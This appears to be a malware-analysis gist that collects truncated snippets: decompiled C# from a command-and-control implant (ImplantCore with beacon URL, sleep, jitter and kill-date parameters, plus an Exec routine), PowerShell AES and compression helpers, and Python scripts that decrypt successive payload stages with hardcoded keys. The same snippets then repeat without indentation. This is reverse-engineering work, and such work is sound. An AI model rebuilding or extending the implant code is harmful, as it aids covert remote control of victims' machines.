khr0x40sh

## PowershellAes.ps1
function Create-AesManagedObject($key, $IV) {
    $aesManaged = New-Object "System.Security.Cryptography.AesManaged"
    $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
    $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
    $aesManaged.BlockSize = 128
    $aesManaged.KeySize = 256
    if ($IV) {
        if ($IV.getType().Name -eq "String") {
            $aesManaged.IV = [System.Convert]::FromBase64String($IV)
        }

## psCompress.ps1
# Compress and decompress byte array

function Get-CompressedByteArray {

	[CmdletBinding()]
    Param (
	[Parameter(Mandatory,ValueFromPipeline,ValueFromPipelineByPropertyName)]
        [byte[]] $byteArray = $(Throw("-byteArray is required"))
    )
	Process {

## decrypt_phase3.py
import os
import base64
from Crypto.Cipher import AES
import gzip, zlib

def decrypt(data, key):
    cipher = AES.new(key, AES.MODE_CBC, data[:AES.block_size])
    return cipher.decrypt(data[AES.block_size:])

def decompress(data):

## ImgGen.cs
internal static class ImgGen
{
	// Token: 0x06000020 RID: 32 RVA: 0x00003478 File Offset: 0x00001678
	internal static void Init(string stringIMGS)
	{
		IEnumerable<string> source = from Match m in Program.ImgGen._re.Matches(stringIMGS.Replace(",", ""))
		select m.Value;
		source = from m in source
		where !string.IsNullOrEmpty(m)
		select m;

## Primer.cs
// Program
// Token: 0x06000011 RID: 17 RVA: 0x000025C8 File Offset: 0x000007C8
private static void primer()
{
	if (DateTime.ParseExact("2025-01-01", "yyyy-MM-dd", CultureInfo.InvariantCulture) > DateTime.Now)
	{
		Program.dfs = 0;
		string text = "";
		try
		{

## Encryption.cs
private static string Encryption(string key, string un, bool comp = false, byte[] unByte = null)
{
	byte[] array = null;
	if (unByte != null)
	{
		array = unByte;
	}
	else
	{
		array = Encoding.UTF8.GetBytes(un);

## Exec.cs
// Program
// Token: 0x06000016 RID: 22 RVA: 0x00002C38 File Offset: 0x00000E38
public static void Exec(string cmd, string taskId, string key = null, byte[] encByte = null)
{
	if (string.IsNullOrEmpty(key))
	{
		key = Program.pKey;
	}
	string cookie = Program.Encryption(key, taskId, false, null);
	string s;

## ImplantCore.cs
// Program
// Token: 0x06000017 RID: 23 RVA: 0x00002CDC File Offset: 0x00000EDC
private static void ImplantCore(string baseURL, string RandomURI, string stringURLS, string KillDate, string Sleep, string Key, string stringIMGS, string Jitter)
{
	Program.UrlGen.Init(stringURLS, RandomURI, baseURL);
	Program.ImgGen.Init(stringIMGS);
	Program.pKey = Key;
	int num = 5;
	Regex regex = new Regex("(?<t>[0-9]{1,9})(?<u>[h,m,s]{0,1})", RegexOptions.IgnoreCase | RegexOptions.Compiled);
	Match match = regex.Match(Sleep);

## decrypt_phase2.py
import base64
from Crypto.Cipher import AES


### borrowed from https://gist.github.com/lopes/168c9d74b988391e702aac5f4aa69e41
def decrypt(data, key):
    cipher = AES.new(key, AES.MODE_CBC, data[:AES.block_size])
    return cipher.decrypt(data[AES.block_size:])

key = base64.b64decode("DGCzi057IDmHvgTVE2gm60w8quqfpMD+o8qCBGpYItc=")

## decrypt_phase1.py
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad

### borrowed from https://gist.github.com/lopes/168c9d74b988391e702aac5f4aa69e41
def decrypt(data, key, iv):
    cipher = AES.new(key, AES.MODE_CBC, iv)
    return unpad(cipher.decrypt(data[0:]), AES.block_size)

key = [0,1,1,0,0,1,1,0,0,1,1,0,1,1,0,0]
iv = [0,1,1,0,0,0,0,1,0,1,1,0,0,1,1,1]
	function Create-AesManagedObject($key, $IV) {
	$aesManaged = New-Object "System.Security.Cryptography.AesManaged"
	$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
	$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
	$aesManaged.BlockSize = 128
	$aesManaged.KeySize = 256
	if ($IV) {
	if ($IV.getType().Name -eq "String") {
	$aesManaged.IV = [System.Convert]::FromBase64String($IV)
	}
	# Compress and decompress byte array

	function Get-CompressedByteArray {

	[CmdletBinding()]
	Param (
	[Parameter(Mandatory,ValueFromPipeline,ValueFromPipelineByPropertyName)]
	[byte[]] $byteArray = $(Throw("-byteArray is required"))
	)
	Process {
	import os
	import base64
	from Crypto.Cipher import AES
	import gzip, zlib

	def decrypt(data, key):
	cipher = AES.new(key, AES.MODE_CBC, data[:AES.block_size])
	return cipher.decrypt(data[AES.block_size:])

	def decompress(data):
	internal static class ImgGen
	{
	// Token: 0x06000020 RID: 32 RVA: 0x00003478 File Offset: 0x00001678
	internal static void Init(string stringIMGS)
	{
	IEnumerable<string> source = from Match m in Program.ImgGen._re.Matches(stringIMGS.Replace(",", ""))
	select m.Value;
	source = from m in source
	where !string.IsNullOrEmpty(m)
	select m;
	// Program
	// Token: 0x06000011 RID: 17 RVA: 0x000025C8 File Offset: 0x000007C8
	private static void primer()
	{
	if (DateTime.ParseExact("2025-01-01", "yyyy-MM-dd", CultureInfo.InvariantCulture) > DateTime.Now)
	{
	Program.dfs = 0;
	string text = "";
	try
	{
	private static string Encryption(string key, string un, bool comp = false, byte[] unByte = null)
	{
	byte[] array = null;
	if (unByte != null)
	{
	array = unByte;
	}
	else
	{
	array = Encoding.UTF8.GetBytes(un);
	// Program
	// Token: 0x06000016 RID: 22 RVA: 0x00002C38 File Offset: 0x00000E38
	public static void Exec(string cmd, string taskId, string key = null, byte[] encByte = null)
	{
	if (string.IsNullOrEmpty(key))
	{
	key = Program.pKey;
	}
	string cookie = Program.Encryption(key, taskId, false, null);
	string s;
	// Program
	// Token: 0x06000017 RID: 23 RVA: 0x00002CDC File Offset: 0x00000EDC
	private static void ImplantCore(string baseURL, string RandomURI, string stringURLS, string KillDate, string Sleep, string Key, string stringIMGS, string Jitter)
	{
	Program.UrlGen.Init(stringURLS, RandomURI, baseURL);
	Program.ImgGen.Init(stringIMGS);
	Program.pKey = Key;
	int num = 5;
	Regex regex = new Regex("(?<t>[0-9]{1,9})(?<u>[h,m,s]{0,1})", RegexOptions.IgnoreCase \| RegexOptions.Compiled);
	Match match = regex.Match(Sleep);
	import base64
	from Crypto.Cipher import AES


	### borrowed from https://gist.github.com/lopes/168c9d74b988391e702aac5f4aa69e41
	def decrypt(data, key):
	cipher = AES.new(key, AES.MODE_CBC, data[:AES.block_size])
	return cipher.decrypt(data[AES.block_size:])

	key = base64.b64decode("DGCzi057IDmHvgTVE2gm60w8quqfpMD+o8qCBGpYItc=")
	from Crypto.Cipher import AES
	from Crypto.Util.Padding import pad, unpad

	### borrowed from https://gist.github.com/lopes/168c9d74b988391e702aac5f4aa69e41
	def decrypt(data, key, iv):
	cipher = AES.new(key, AES.MODE_CBC, iv)
	return unpad(cipher.decrypt(data[0:]), AES.block_size)

	key = [0,1,1,0,0,1,1,0,0,1,1,0,1,1,0,0]
	iv = [0,1,1,0,0,0,0,1,0,1,1,0,0,1,1,1]